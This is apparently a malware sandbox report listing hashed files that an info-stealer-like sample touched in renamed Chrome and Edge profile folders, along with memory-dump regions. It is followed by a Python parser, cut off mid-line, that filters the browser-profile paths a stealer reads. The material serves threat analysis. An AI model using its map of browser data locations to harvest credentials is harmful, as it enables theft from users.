SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

memory/1508-726-0x00007FF7239B0000-0x00007FF724BD6000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Crashpad\settings.dat

MD5 98fa3f2150a5f5ee4beb6ba2d3b2bed6
SHA1 c52b48e53d61b36972eff716074f7aa925988fb7
SHA256 af594b544328c089c5a95e232bae36ec6d1953af518f9a5969285454fa81861c
SHA512 f31a4a2d063b7948b50f294b2f496bce5bb9ce007b806dca2225195f93e4b545afcb948d096d4dda16360f94ec51a4850440eb1f5a17703226e71606f9ec7c5a

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\chrome_debug.log

MD5 69dc8fa435a3c82583b6e979b5fde4b5
SHA1 9e9bc6ddb885e9e0ca091c560de9aef1a77b1ca4
SHA256 d6dfbfbba61ecb5a81130febbeae4580cbd7b3c95e9d963bf2a48ee66bad7cfa
SHA512 399b1fa4e6a7a43fab1ca8780efa3e5c951acf833a52bb9cc7a7d6325cef1b93f77c09e2b1650de6b719a91ca99bb73bff6fb8e9169140ec02ceccc8b5cf7749

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\DevToolsActivePort

MD5 8c4692e4b42d9920a9bf327f9c6d5117
SHA1 c6008495182985885ed21a0f79d8417f19395326
SHA256 92622eb3b17272f850c8dad0922d024333bc51f7a08e09255935a4d43bce557f
SHA512 77d77274ea35ba03fe12abf2f88599530d4f862dca1ed7c5e56f00609701efc6765fa4a4c39dd3dff5d03b11baf600ff616871d6f70ce83c5205f3c0bf99ba0e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\data_0

MD5 49d11d652a15a3d779ecd380d1c26a9d
SHA1 b13e298bec883efb3eaaa7bf7d8f847c18d9bb60
SHA256 b061c11a9a657f2ecc61ec4840124f18788a4b1465407bf0a55217ed11649bc5
SHA512 5c75a6d416202f82635bac3e4d95078f0b73e0461324cab673fb85109b3eff077c3b2004a5285f731ecf32a388767538cdf7053a8e0709b6cbe47b0257b644c8

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\data_1

MD5 24e7ec68d55ab13ef2161a1ced35e2c6
SHA1 7abf8eda25288176432bf6b8d69787bb7391891a
SHA256 3d590e67030a33e842b760a8d9dffc21dc389b7e56d1d9b89c4b06bc1819744f
SHA512 5d14a35bb1c7e166dc9534bf569a116488a3c051aa6329dac5682b6bc5c1d61a9d2bc0f5192a5ffbb43e27b8412b83e91901879c58750855780f4da858c7342a

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\data_2

MD5 03d3dc1e7509931fd14aa2afc5944273
SHA1 1f932559eea13b0c07b2f3612ec6c1b4e254e49c
SHA256 21a3d2283bb4673d292c22ff1b29a4c378310ddeebb63d0eb9267be0a43e26a0
SHA512 0057c74170787b00d8efeea8bf6f63a735016b02a128441e0d425db8d602956fe57a9753a8a312d9ab2cb5ab416f231d1e960ae22d3756f008e88b405c706a21

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\data_3

MD5 2ace782056ae5e8d553a9c1c3a79ffde
SHA1 d95248df23904ceff133c0e615e83193e9965845
SHA256 8d16e01c5422312f70a0a39a9abacaa68818cf6f479c37606f3197dfc06ca38f
SHA512 9e3dd3df7e48bd976a3137207b122f5867f4c5e873557f5f5c625552b5b93e0c67ec6176171767419ff35f0b393d5f6b0b1eede3e2252b0697f8ae42a244e743

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000001

MD5 d5f8b619bfde6861fd861c5cb31f573d
SHA1 524c053e7cf5949781a2ab307b194a2d94b183f0
SHA256 506e50e0607fbf547b08a20db4bbd1b27f6cedba24995daad4e55143e9d3fe79
SHA512 b7b58e11f7d377c1b80bacae55d0e96eb8369d473f345d87e294d8b8d95126d6cd312bcf5afb0e7fb6c4973d9e15d5227006af6b625ddc7eddbbd5695cb8de89

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_00000a

MD5 7d75a9eb3b38b5dd04b8a7ce4f1b87cc
SHA1 68f598c84936c9720c5ffd6685294f5c94000dff
SHA256 6c24799e77b963b00401713a1dbd9cba3a00249b9363e2c194d01b13b8cdb3d7
SHA512 cf0488c34a1af36b1bb854dea2decfc8394f47831b1670cab3eed8291b61188484cc8ab0a726a524ecdd20b71d291bcccbc2ce999fd91662aca63d2d22ed0d9f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000009

MD5 c101a8ba729b894927d7d884e4be68a8
SHA1 4bf48f94ff4e50e81c9d83b641af74b3bed580a0
SHA256 544f08482a62485be4acbc443462b01fe16b408b3d154c0cb1ff921a453cee33
SHA512 77483a92abeed799dfb1e782988569875b29eccebfb14e5be353302849ea6f0ac6a6411a72d6da706ec3767a54f12907fd0bfa4646ad4ca1cf4e1e15fbe9a9ed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000008

MD5 9f1c899a371951195b4dedabf8fc4588
SHA1 7abeeee04287a2633f5d2fa32d09c4c12e76051b
SHA256 ba60b39bc10f6abd7f7a3a2a9bae5c83a0a6f7787e60115d0e8b4e17578c35f7
SHA512 86e75284beaff4727fae0a46bd8c3a8b4a7c95eceaf45845d5c3c2806139d739c983205b9163e515f6158aa7c3c901554109c92a7acc2c0077b1d22c003dba54

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000007

MD5 6a3bb9c5ba28ee73af6c1b53e281b0cf
SHA1 d96e403c99c1707f82ea29c2c1f134e792c64097
SHA256 2f5adfc38558162578ffe112229f10417fbc4b3df025d153d4e22a0c95177740
SHA512 6c4844f70969938339cb6716a834a79e1a8379459c87b983c2518b9cbb560cb2f101aff980f682989928523be6cdc99bde3bfd8137f9c54a58191b900b580fbf

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000006

MD5 5236a1c2653afc1522e249b922a5332d
SHA1 a36fcdb48c7c28dd1289d6a42fe253b1c3c46d68
SHA256 70ccf1cc02afa1a8c54f64088e767397798d899c559682fca821799671393a22
SHA512 95229004b79fd571a34dd3d1eaca523b648d8f17b8cb07dc7d5d6baa6f7c5a964eb396584bbe698dbe22f5afde29bc64afde544cb142686c2d05957d48273987

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000005

MD5 d3f60c28d769a4654c5d775e4cee7e0f
SHA1 45c058d9579ff0e8dcafac8fbdc1fd81992ab2d4
SHA256 af8fad3113b9a1ff182a631c753fd4f301a6005e6c17973bbbd1b17727701dc8
SHA512 777baf3a6e8d737143e3560e36334c54a165c4568bfecf5be17755bd1eeb85ce035bdc4531bd2f25fdfbe10766040361f63f3057ed0745401f8712fbbd05c2aa

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000004

MD5 21808cd0724524589cd4ec1ce26f6d58
SHA1 fc5cc4cb347ed20389626c58a6de396ef1ac5ada
SHA256 1a7608a326717e18f424991b924d9c7319eb273cc3af432585d95ce8b068ca8d
SHA512 36902ff35a1ed469aa9cab3856b1b0057ca7db8ea4d92ca1d129e68f02eebd5322a4e81aec29a2b1c0c289e2f82df13684ccf0305378878494260c4d4e6caf0d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000003

MD5 17eda5d2659e183d4db8861f570d3810
SHA1 66427ee2560bd02afeae11be6daae99d6e4243ea
SHA256 e759fce16f087abf8de9a06095cf0acfcd792a8db706414cf2b3d3c80dd7beef
SHA512 35cbbc2e3db22e350f197b9a0b4ccb92790bbe4ae5821317797b4796e8808f660b266a9ce74b109f424311bab3c38481839b8bde5988d5bcaf350fbfd2a02379

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000002

MD5 6da5668a45351c7da842c6c9de0c5361
SHA1 17b944af56a4a88262b22371df0dfe8bbc496833
SHA256 12ff5424ed41291c2351d4a23e115efb10cf5189a1e4e1addf5743ea4f37faca
SHA512 30fb4ab20d18640e45ed1bafa30fcc0c8a5c0cdc0b08cdca93feae12c405d7d0de181e535fee1c2fe31fc15a93c9d1c442320667f0a4a902be4828024645c482

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Code Cache\js\343f6993e27f1d39_0

MD5 32a97ed74df8cd53b22766d360c41f03
SHA1 ee3544bd940ba1cb521eb097efae2950d4decdc4
SHA256 f27d632829bd3e8cc7aa6367c7520fc07ed6a9fd41c802b8a979e4ec12c1f9bc
SHA512 d2270bebb140eecf7ffb780c729f42511d7eacb93ee781117ae90b0611d465a9a6c5fb5fd363cd423b0ba946d157c93f87470e5a103d9f95997df5969b25ef5d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Code Cache\js\2e64514b9cd267ab_0

MD5 1256568ea18aee91e2de3f8dadfbff51
SHA1 a4e6ebae64067e5e9c0be71de492093b26de8879
SHA256 af66713278359cc39e41427b01df2eb525297e73dac038c00c885c6eb4ef271e
SHA512 cca7d48765a328b6518ecac200889a31b1069cdc133f06afa2094a1d47d42cc14877996b76a169f1f8d111e94ddb4e9946a3d3be568f0be04940d3aa13dc8e3a

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Code Cache\js\17e99028d152eccd_0

MD5 f02a41da661472e441b81f808a3285ed
SHA1 01539d5f652c5601c363636f8ff7c8d1669e7f2b
SHA256 0e40f144fae2c75a84771b9922dd32195b504ae125db9e1291ed5e671edb68a2
SHA512 79cbc4246d879aaa75528f05663c7a4ca270567f34743f88dd0218a5bbc398dcebe10303b7172c8b3aba08a5f6aa03eb227a407c1b7f257612a2b912e7668455

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Code Cache\js\06db5837b6c74111_0

MD5 a5bb71d5ac19739bb7814878e324cf58
SHA1 a36abe559c0fcb02b51693f3bba40fdb16951738
SHA256 945c158f160d29f5f103cc17070f07c25bc8b01a241d958579898bfd053ffae4
SHA512 5a06c78bfe850904f917703738d37b35c197fa7dd754fbe8e1f9f336a26ad127d160667d4d18c5334974c101081d0db29f50133a1b2425f816afe609524a9f5a

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Code Cache\js\056093a36a95204b_0

MD5 5199cecc2891f7eb5c35d6b9f1a04c96
SHA1 ae45538d4980840112dfecb14e811e3e4a60914f
SHA256 ba3afa6499c1445089f8210b64e4f1974d175e359e489f81329d53475e80c93b
SHA512 b7d721c3f6f7ae63fa1993653a6046ccbe0dccb95d370d26c748d0b1e90b9efb2c1b65a0a849934507de51f49187a742c2b35d7f1205bb49d5dc5d474c45e38b

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\index

MD5 ec5b5ca24e3220eed9dc38f132a2e465
SHA1 26c11d901c344e65a0838f3df4832cf7c1ba6adf
SHA256 d1e93048f2c8ebf8d969f436b85cf52a723f06859b963514568327f9c40d03ce
SHA512 bd81a3f635dd713d7c41bb734a59b680018abeda3c3071cb3f5a842295e6f59b5ee7a7929e1dcb34a1664cb57a712020d434b2db2f1b9c8ea64786a4b2bee30b

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000015

MD5 09fcf372ae90d5a60679f8ae4f3470de
SHA1 148f90f27a8af4cf63dc6bc9e4642e21ab30d4ea
SHA256 574658e831ce78fb5a714b44b8dac9a0733886c3c4d15bf84da893a1d21ea49a
SHA512 aea96835a5a8e66b43ff112ea9c3054ad9db01875d5df8a613044d9299d51d3dc399d335633440e23f4dfd5c07d9f9c2398d8311fbe38e71c55d8b1605d8a400

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000014

MD5 f88677e29b54dd5db296c326af6a4d9d
SHA1 1de3f597acaaf196e878c566c84dc27ada095d0a
SHA256 cad8566d3569c9df8104ca1a2f7a707fad71762f77cc34b009eee7ad753ab29e
SHA512 92d6c7bd43c437c596096e61b34a04799c82c0f79ab208ea04bf652faec038bde6c363686c6c973158b1048c81ed979874b369379d02e8e5e8ef9a94c354368c

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000013

MD5 871f7ecfcc9407aaaf179e917aa66306
SHA1 876298a6ca7cd90dace253636a70d1078a967140
SHA256 c0007603181a3cfcddbabde97699835d028309ebfd7ad2dfd528b6e24305ca7e
SHA512 64446cd7647fa751a28e327f05b30549a2d846dd0a6da0c60f98a2ca62db7e8dc0567b0a0b5dd61f38737515b4119ad02ba81b58512aed09a990085b5ac888f5

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000012

MD5 79b9a3fa2b9659e042b021c7b5e2129b
SHA1 0608194000a372f4388a1910f388c1c0b7fb38da
SHA256 49e21d3a2743c40a16e5610bf6a1e0ce1a43c28f392ce741858f88cc17df736b
SHA512 a10f34b2890a46924ba2ed95522540ae1dc94051ab945dc471610b05dccb9991a0770cdcc256ca7012c58980c3cc2c671091d26b97cd65e454b514db6779ed8d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000011

MD5 4fa74969dad84db849ab5effd5b0c6da
SHA1 e7a50d8643b90d0ac2b6159b249bd9c8b3163cc6
SHA256 70116c1df645fff28c254727d01019954a046d24a1e0bb95861a003627a6ee05
SHA512 b79e02b6b856f59255da95202d4df84c701adf2b44f991959dc70b90f416311ab6bdce918247ce04f2d2763155d9124083125dd102a2c604b66816d14026d217

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_000010

MD5 9c4150890d48126e9e22f45e046199a4
SHA1 abc1a73a27ab8c98389d40457795702a404dff05
SHA256 e2b711c03d6e9dd4595cb09134cd844b9339cdb82234c4aa300e3415c8195da3
SHA512 a568a1aff7b522b5a059065d54c8d68bbddd7cdc106b0f19915e2c804c6d750f92e3ffacd5509e87daa0b8413c7d1428cc344d8c8712ea3ea479e9a0897e7af7

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_00000f

MD5 789fd4f17cc11ac527dc82ac561b3220
SHA1 83ac8d0ad8661ab3e03844916a339833169fa777
SHA256 5459e6f01b7edde5f425c21808de129b69470ee3099284cb3f9413d835903739
SHA512 742d95bb65dcc72d7ce7056bd4d6f55e2811e98f7a3df6f1b7daef946043183714a8a3049b12a0be8ac21d0b4f6e38f7269960e57b006dfec306158d5a373e78

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_00000e

MD5 189badc72a668aade50699ae05067c2a
SHA1 5458410fc96bcf08b29f204b05470dad5882afb9
SHA256 896d76b06fe7bc62fa10e8f9091b84584d8fdbd7eaaea1183f7c1e5e3a98c559
SHA512 287ff71f9b6ab261f989792cfee0b99e1745c57e8e8c9c3c55e07592a835008673a9ee5b2099ef9beb6ef4343c10827109b281b2fbed0fe0de1da020723c622b

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_00000d

MD5 250bdff8769a9791656b1475a293c486
SHA1 31ccb16008e78db499d1cc68cff74ebf1979f1a1
SHA256 aca7dc1db7b861fa7c839ae3c537ed48b098ffedc1151c0fb95e744af1cb7738
SHA512 ba37f07adc32644e34700559f11a654a7862787ab1bb5bd53040c42b16a80f336823dca61e202a07130ad0845335b2d92b404567eded9619b4569d1b544ebcf2

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_00000c

MD5 2d52125a96fb5a7227c67848bc18f65c
SHA1 a3593c6d8e3b6b458b6bbc2c6423dc76e30a84a3
SHA256 61f3154c19e46e1989d6fadbfe20835d0c9fc47242dc5828e776e3ec667fda24
SHA512 5f151708007cb474e64e8968b1f6b5e5331c434cc237627c6c5c92d1894d020f476ad88461e35fbf383aa46750a9cdcaf3a2ac8fe90570753c73fcf17ac0cbe6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_00000b

MD5 f67dde285de5f831537c104e505e2f05
SHA1 9c967dd7e4b45de90af20983e78cbd315f7cc700
SHA256 918122ce975ea0a50f0da079028f0a059129d7fad0aeb7a4a52a13640a80dcae
SHA512 2762d03ab4e317fc1c08077ecf08e4c8f05be73abd18c441b2e4480b4b177c13f51056fce403997b9337739a1a180d114ddcd223109af815e38e046b9baa7845

memory/1508-816-0x00007FFAEB4B0000-0x00007FFAEB6A5000-memory.dmp

memory/32-845-0x00007FFAC9840000-0x00007FFACA301000-memory.dmp

memory/32-846-0x0000022EE8500000-0x0000022EE8510000-memory.dmp

memory/32-847-0x0000022EE8500000-0x0000022EE8510000-memory.dmp

memory/32-867-0x0000022EE88A0000-0x0000022EE88BC000-memory.dmp

memory/32-869-0x00007FF479DC0000-0x00007FF479DD0000-memory.dmp

memory/32-870-0x0000022EE8880000-0x0000022EE888A000-memory.dmp

memory/32-876-0x0000022EE8AE0000-0x0000022EE8AFC000-memory.dmp

memory/2772-924-0x0000000002660000-0x0000000002696000-memory.dmp

memory/2772-926-0x00000000747E0000-0x0000000074F90000-memory.dmp

memory/2772-929-0x0000000004C60000-0x0000000004C70000-memory.dmp

memory/32-931-0x0000022EE8890000-0x0000022EE889A000-memory.dmp

memory/2772-933-0x00000000052A0000-0x00000000058C8000-memory.dmp

memory/2772-934-0x00000000058D0000-0x0000000005936000-memory.dmp

memory/32-940-0x0000022EE8B00000-0x0000022EE8B1A000-memory.dmp

memory/32-946-0x0000022EE8AC0000-0x0000022EE8AC8000-memory.dmp

memory/32-952-0x0000022EE8AD0000-0x0000022EE8AD6000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Cache\f_000002

MD5 21808cd0724524589cd4ec1ce26f6d58
SHA1 fc5cc4cb347ed20389626c58a6de396ef1ac5ada
SHA256 1a7608a326717e18f424991b924d9c7319eb273cc3af432585d95ce8b068ca8d
SHA512 36902ff35a1ed469aa9cab3856b1b0057ca7db8ea4d92ca1d129e68f02eebd5322a4e81aec29a2b1c0c289e2f82df13684ccf0305378878494260c4d4e6caf0d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Cache\f_000004

MD5 33aaf29d062b2bffb13f1e1847ac06ad
SHA1 97c88abc33d6de7611f3ed1d9f774072ad61ec36
SHA256 dd8232da1fdc726aa31755cbf585d79cbfa7a93955c82a768cefc8b722fb3490
SHA512 8c93ebd1a8aacc96fd6f896993d18f2df86a5b881dbc423d389f430f8686c9b728f8d12d54487bab916e37127fea82572d91eec7546d070917b56359e0ab47f9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Cache\f_000008

MD5 e905d749d610e52b8f228c949e3ee5a1
SHA1 af8549159a62dde03f7885bcd18a45cf82d199d8
SHA256 fbe26dab38951560b96de0f13bb1f286e3cb513e0d2c0212b42c328b83683dcf
SHA512 776ed3a6f11b1fb8fe208299f4c9cc608e16e342d75aa7dc8d8f235d7a01fd92540acd93978605d7952f7ac69eadd1230b63a5ea153e5bcee1bf4414c1667dc6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 9f4b9de88b64c212e26f4e2b345dadf4
SHA1 82ce91114d986ec8d2d8cf4d65d331743aa73850
SHA256 4beb35c2889713ee477150bf49f894d70ad69b3f233a3fc62750650fad68a457
SHA512 1b03b686afda5a0474e2f635102289ab1138c8daa09a4940e95d2feca45214d08f2342e7ef06d3199f6725f4cf870e2071bfd8430eb279c4e071519b96ad6bfa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe58c668.TMP

MD5 20b061fef6222dcbdbfc73671a938a0b
SHA1 bb09557d5136c7c84d3ed3025bfdd2539d7a57ef
SHA256 e6f8ff0c0f404dd679b31a5fd785f3431595f5131713315766a480eb6b0eeaf1
SHA512 e4b95771e0983187ec6c6714718b9dde130b1c249cef679a2d845439473dd2b7b32df690ccbc15cae7bf1b1720a6e526981a49345e9610aa08fae8a71e33206e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\MANIFEST-000001

MD5 3fd11ff447c1ee23538dc4d9724427a3
SHA1 1335e6f71cc4e3cf7025233523b4760f8893e9c9
SHA256 720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed
SHA512 10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 faedf2f1b9fd85cb8042fc23687cc824
SHA1 aa3e0fcf78d16361e1ce63d06a8fedfb37242c5c
SHA256 cc4a0e570eb37e942ed02e5a353dae0cf4e38fdc38ad5fe6c30d1edff89ea683
SHA512 4c44d444681028401dc2f7b0de9ccb99fcd0fff16623da530dac43b1cb5d1010c39c01c5b58a91642dd2afb7532afd9be73e586ba560c88b5ffa8ed50fb049d1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 bceb0f4394bd527e19782eb328c0afa4
SHA1 f6ca11a15c1a6aba576ee0fc08416e34c8cb5c35
SHA256 7635b3e3c04363b65fe514b2b791bfe17292b6d540793c1f578b77224874ba0d
SHA512 82d4b78a1b2ebea285aade5903565a3c2f590bf4fd751d291dab52355f7b4a9c4399874949c360bc333efa98935bd5532c39d52f1dcb04f14a9ebd9f90639f5e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Code Cache\js\index-dir\the-real-index

MD5 a751b3be94c078a200cebe80ba18adb2
SHA1 dafe464b664a1d509a5de2fa148d2bd9695cc9f8
SHA256 7e9d08b1c46dd2ea8bd9c9c8f3a3ef079756ee0c1dd82c5473fa984334e9dd2c
SHA512 a5887fb795a474f9251041f9b51292e93b5a488706575118f434aecfe6012ef06753d80c2371efd69852fa48c83a399709e0eaa5faacc74ef2cac935e754c717

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 b0eda4be488cd48548d0f0b2db0cd0ab
SHA1 df0526523eeeabdaae51224450451b6329db8507
SHA256 14c9a121457eda580ad0b3b06c0ed76db5ec1f86961b4c30314612e0e99160dc
SHA512 47c7572e259c490f004a487161d0bce2d0bf351ca9e91815b1f31412be74cb2ead93af2f7ceb185670c02a7e7aa757bbb7f011a1e2f06c9c6785f27edf6b2a73

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 07e98b0f9f311ba341ba9e84ba41ba17
SHA1 1ae5be32471821dbaeca32534fb331042472f902
SHA256 59bb91c83fc0789991efa5683934cf70402e790f95a73b368137607355a0b30a
SHA512 830c512f85fb38b0fd1a5073d60ec3e2ba48eb53806f0dd7f7764616a445d4988686116d3584c9dd7e571ff1a658a5c04de802568a9dedfee2fe0a5e5853d79f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\26aa1d27-0b49-4ff7-9c03-c6aa7002fe9f\index-dir\the-real-index

MD5 d5904448a1d2acfbfc726ad40c781399
SHA1 939733cd85cc604198c19f64d2674a483a3f90d5
SHA256 2fb54de98e08562402609c87bcb7cf3d29bba2cf99d7cf5583c22b3c65ac2454
SHA512 e7e1888db9c3a929477ace7d81f312b46f9c6acb5c49a367fa6db2b165034060c23e877524b3b1220c54972d56bebcec08b53559cd62a3b6745720ba1d3f919b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\26aa1d27-0b49-4ff7-9c03-c6aa7002fe9f\index-dir\the-real-index~RFe58d174.TMP

MD5 9ea4fe8a3ea3ab2c2791cbbdc672e0e4
SHA1 e356190ef21446410d104ebe7099f7dcbe09100d
SHA256 3686ae7ad1c81495bcf4d106dfc7486f4e3e932f7bc638c2965d80571d6699d5
SHA512 68e4f53e810fe57c0a55d26176092b1341108e13969d79f1461d80b6dfeacdca84d99da2d81a6a16f7fd7393ec3a41f87bde62eeba23eecb3405fd82ae1e030d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58d174.TMP

MD5 1d4b2ca7f3f999524ee6330d4189c687
SHA1 c4b496e9b38a7a0b616844bbe19e549f6e099d55
SHA256 1d3a7fda9d1cf5e38d7fb802d901d734bcc57e1ad3606b009d4ef8782fd7e1a5
SHA512 0ab441aa2c06d13632309786918309cdfe0ce76dfb3cb357a29e7ca79bd15d92860bc3dd634fc12c357d5135f13c7d091c2d08bb1ebf95c38686570a3739b8ce

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Code Cache\js\index-dir\the-real-index

MD5 506db96e96fd6fb07a93ae76eae1399e
SHA1 3697661fa0970ba8db0fc54f91581d0bb6b4c88b
SHA256 435b821c9b94c0f3e20165352e1e4309c808b2d3d27433dd16fb15541207402e
SHA512 ef806b9733ba5549cd796706e8eb21643717f0c02d193a6151aa4f01354266a6a94e902ab051cf50de4c7fab65813944af252695113e88d1db72ec45bd242902

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\6fca92e5-6899-405b-9f51-d0495f2c4c72\index-dir\the-real-index

MD5 8be9d3a797fe07972e0be85fe35617e5
SHA1 9fac6d9aa1fdd3ab49c1c84bb722ffe0e69559d5
SHA256 510ad7e384ff2aef1fb62bc9ffcfcc1bcdab8508e1f4748d388eae0b3d3527d8
SHA512 2fa82906628ee00db6aa6a4b643fbd41f88fa9dc783ba3cbfa80e6016c5ab21b5a680db3ec8ac8ff8b8b6ea6b4670f0cc4eba6b8d49b7d285658c2cca0477db2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\6fca92e5-6899-405b-9f51-d0495f2c4c72\index-dir\the-real-index~RFe58d174.TMP

MD5 de946ec9b77704eecc2e14f660712969
SHA1 dc57d658dee581139d27852099ebbca5493ed226
SHA256 0394908513a710607193d13fb62de215e738340449f050c39845cbb348945f0f
SHA512 710e735dd93ae3c02a66cc069f602b87cf82cb445a25c18a9b04834fe8c8826d91c3608aa83016fe2a5c37b5ecb7b61eeb29dec21a01fef7edae5ab8abae0f5c
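The listing above mixes two record types: dropped/read files (a path followed by MD5, SHA1, SHA256 and SHA512 lines) and memory dumps named `memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp`. The example below is added here and is not code from the report or the sandbox that produced it; it parses an excerpt of the listing into typed records, validates digest lengths, computes region sizes from the dump names, groups regions by PID and filters the browser profile paths (`Google\Chrome\User Data*`, `Microsoft\Edge\User Data*`, matching the renamed copies such as `User DataPINGC`) that a stealer reads. The field layout of the dump names is inferred from the listing and is an assumption; the sample input is a constructed subset of the entries above.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample input: a subset of the report's listing, copied verbatim.
SAMPLE_LISTING = r"""
C:\Users\Admin\AppData\Local\Google\Chrome\User DataPINGC\Default\Cache\Cache_Data\f_00000b

MD5 f67dde285de5f831537c104e505e2f05
SHA1 9c967dd7e4b45de90af20983e78cbd315f7cc700
SHA256 918122ce975ea0a50f0da079028f0a059129d7fad0aeb7a4a52a13640a80dcae
SHA512 2762d03ab4e317fc1c08077ecf08e4c8f05be73abd18c441b2e4480b4b177c13f51056fce403997b9337739a1a180d114ddcd223109af815e38e046b9baa7845

memory/1508-816-0x00007FFAEB4B0000-0x00007FFAEB6A5000-memory.dmp

memory/32-845-0x00007FFAC9840000-0x00007FFACA301000-memory.dmp

memory/32-846-0x0000022EE8500000-0x0000022EE8510000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataT1WYG\Default\Cache\f_000002

MD5 21808cd0724524589cd4ec1ce26f6d58
SHA1 fc5cc4cb347ed20389626c58a6de396ef1ac5ada
SHA256 1a7608a326717e18f424991b924d9c7319eb273cc3af432585d95ce8b068ca8d
SHA512 36902ff35a1ed469aa9cab3856b1b0057ca7db8ea4d92ca1d129e68f02eebd5322a4e81aec29a2b1c0c289e2f82df13684ccf0305378878494260c4d4e6caf0d
"""

# Assumed layout of dump names: memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp
MEMDUMP_RE = re.compile(
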